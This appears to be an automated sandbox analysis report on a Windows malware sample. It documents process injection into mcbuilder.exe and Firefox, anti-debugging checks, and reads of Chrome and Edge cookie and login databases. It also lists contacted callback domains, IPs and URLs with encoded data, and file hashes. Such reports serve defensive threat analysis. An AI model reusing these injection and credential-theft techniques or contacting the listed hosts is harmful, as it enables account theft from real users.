Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Memory allocated: 78C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Memory allocated: 88C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Memory allocated: 8A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Memory allocated: 9A60000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\mcbuilder.exe	API coverage: 2.6 %

Source: C:\Users\user\Desktop\dGHiTqj3AB.exe TID: 7532	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe TID: 1740	Thread sleep count: 137 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe TID: 1740	Thread sleep time: -274000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe TID: 1740	Thread sleep count: 9835 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe TID: 1740	Thread sleep time: -19670000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe TID: 7228	Thread sleep time: -45000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\mcbuilder.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\mcbuilder.exe	Last function: Thread delayed

Source: firefox.exe, 0000000B.00000002.2736398838.0000018B0A71C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
Source: mcbuilder.exe, 00000008.00000002.3492126956.000000000335D000.00000004.00000020.00020000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000002.3492532722.00000000009FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Section loaded: NULL target: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Section loaded: NULL target: C:\Windows\SysWOW64\mcbuilder.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: NULL target: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: NULL target: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: fgebfePlJm.exe, 00000007.00000002.3492658941.0000000000CE1000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000007.00000000.2188243341.0000000000CE0000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000000.2469700988.0000000000F90000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: fgebfePlJm.exe, 00000007.00000002.3492658941.0000000000CE1000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000007.00000000.2188243341.0000000000CE0000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000000.2469700988.0000000000F90000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: fgebfePlJm.exe, 00000007.00000002.3492658941.0000000000CE1000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000007.00000000.2188243341.0000000000CE0000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000000.2469700988.0000000000F90000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: fgebfePlJm.exe, 00000007.00000002.3492658941.0000000000CE1000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000007.00000000.2188243341.0000000000CE0000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000000.2469700988.0000000000F90000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: Yara match	File source: 0.2.dGHiTqj3AB.exe.72b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dGHiTqj3AB.exe.2cf513c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dGHiTqj3AB.exe.2cf513c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dGHiTqj3AB.exe.72b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1754732124.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1757860800.00000000072B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\mcbuilder.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\mcbuilder.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Windows Analysis Report dGHiTqj3AB.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
dGHiTqj3AB.exe

Malware Threat Intel
Provided by

IP	Domain	Country	ASN	ASN Name	Malicious
195.200.3.58	bosonserver.net	United Kingdom	8897	KCOM-SPNService-ProviderNetworkex-MistralGB	false
103.29.180.74	accessoriestechbd.com	unknown	4686	BEKKOAMEBEKKOAMEINTERNETINCJP	false
3.33.130.190	hourglasspoise.net	United States	8987	AMAZONEXPANSIONGB	false
217.160.164.240	asymtos.tech	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
203.161.42.162	www.lontos.top	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	false

Name	IP	Active
accessoriestechbd.com	103.29.180.74	true
www.lontos.top	203.161.42.162	true
hourglasspoise.net	3.33.130.190	true
accelbusiness.net	3.33.130.190	true
bosonserver.net	195.200.3.58	true
theiconsummit.life	3.33.130.190	true
asymtos.tech	217.160.164.240	true
www.hourglasspoise.net	unknown	unknown
www.theiconsummit.life	unknown	unknown
www.asymtos.tech	unknown	unknown
www.accessoriestechbd.com	unknown	unknown
www.bosonserver.net	unknown	unknown
www.accelbusiness.net	unknown	unknown

Name	Malicious	Antivirus Detection	Reputation
http://www.accessoriestechbd.com/5pdf/	false	Avira URL Cloud: safe	unknown
http://www.hourglasspoise.net/5gvb/?r4HtI=inDHeTS0D6JHi&bPD=/cc9D7vqfViixqGthyicdvN6zULLmywOC8ezpB4FmcTpRtjTbyPN+qyyn2oVZVAAZJsSw+aEzq+oGUOxhiKfxK7cUWDoBkvPGfZgrhOxmX7AStJyIMBk2Ik=	false	Avira URL Cloud: safe	unknown
http://www.asymtos.tech/34b9/?bPD=W6RiSnxSk7sWUyAWv8iRSiD0PbjPvpVwUriP78iMWJLg9pjq2qbXqPDPIc9Rf4jTN/ETygayReM86N3bYDrSkNDIFOCHTFVOdGC1q9B2gGW6d9vv3KfEEgs=&r4HtI=inDHeTS0D6JHi	false	Avira URL Cloud: safe	unknown
http://www.asymtos.tech/34b9/	false	Avira URL Cloud: safe	unknown
http://www.theiconsummit.life/6fdz/	false	Avira URL Cloud: safe	unknown
http://www.lontos.top/ukrf/	false	Avira URL Cloud: safe	unknown
http://www.bosonserver.net/x10g/?bPD=AtIpZIbrclbIO3wVVorP/+4YW7XwgThFYZcx/yn27KMXet/sCHbTQiCzWIx6Kv/NnE9nJScnuF31JPyJpxVQ15qsd8YhwJ4GP0n6fMl4YdtRcYZTZezTcHY=&r4HtI=inDHeTS0D6JHi	false	Avira URL Cloud: safe	unknown
http://www.bosonserver.net/x10g/	false	Avira URL Cloud: safe	unknown
http://www.accessoriestechbd.com/5pdf/?r4HtI=inDHeTS0D6JHi&bPD=Ej/EzQPepC1y7H/CB3fFjxmxT5K/uokQyhXQpBVK3nqnb8oYKZIShVAN8OJA1iYy8omWkznWlYUMQWoQrGGIZe4YpIxUtk1QZkVuvgrHNfuUWu/hH7rCDC0=	false	Avira URL Cloud: safe	unknown
http://www.hourglasspoise.net/5gvb/	false	Avira URL Cloud: safe	unknown
http://www.accelbusiness.net/sg0d/?r4HtI=inDHeTS0D6JHi&bPD=ZFII8SVAvGzgMmVXT4ZY+5svGFARRAPMY6hEAWMgzd/rbIPLPNZ+nr66isGJwkaWRyig0DUujo2cMsRd49nDMp6VdguE/ogC4VFXU40D/gpWgkUbHmnCm4E=	false	Avira URL Cloud: safe	unknown
http://www.theiconsummit.life/6fdz/?bPD=Oie1FXKEyOqxuNWWyzkYdPfZReRkcG0Z1Eay2KtVdEC34I4dz//PHzzr4ve1tSfSRt9M/nPWu6bDrMp0Hm7HeQWrGZPcmCLmPnl5GlJrMre+ojzyhGOYA5A=&r4HtI=inDHeTS0D6JHi	false	Avira URL Cloud: safe	unknown

ID:	1483009
Product:	CloudBasic
Start time:	13:54:28
Start date:	26.07.2024
Sample:	dGHiTqj3AB.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	1f5c95d40c06c01300f0a6592945a72d
SHA1:	79a217ed19833efcf640ffd8bb04803e9f30d6f4
SHA256:	434ec59b680788bae7f2935200a77e681cecbb517d853c6e6cf31f4cf112e5cc
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dGHiTqj3AB.exe.log	ASCII text, with CRLF line terminators	1330C80CAAC9A0FB172F202485E9B1E8	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
C:\Users\user\AppData\Local\Temp\6fI63K3E	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2	780853CDDEAEE8DE70F28A4B255A600B	AD7A5DA33F7AD12946153C497E990720B09005ED	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3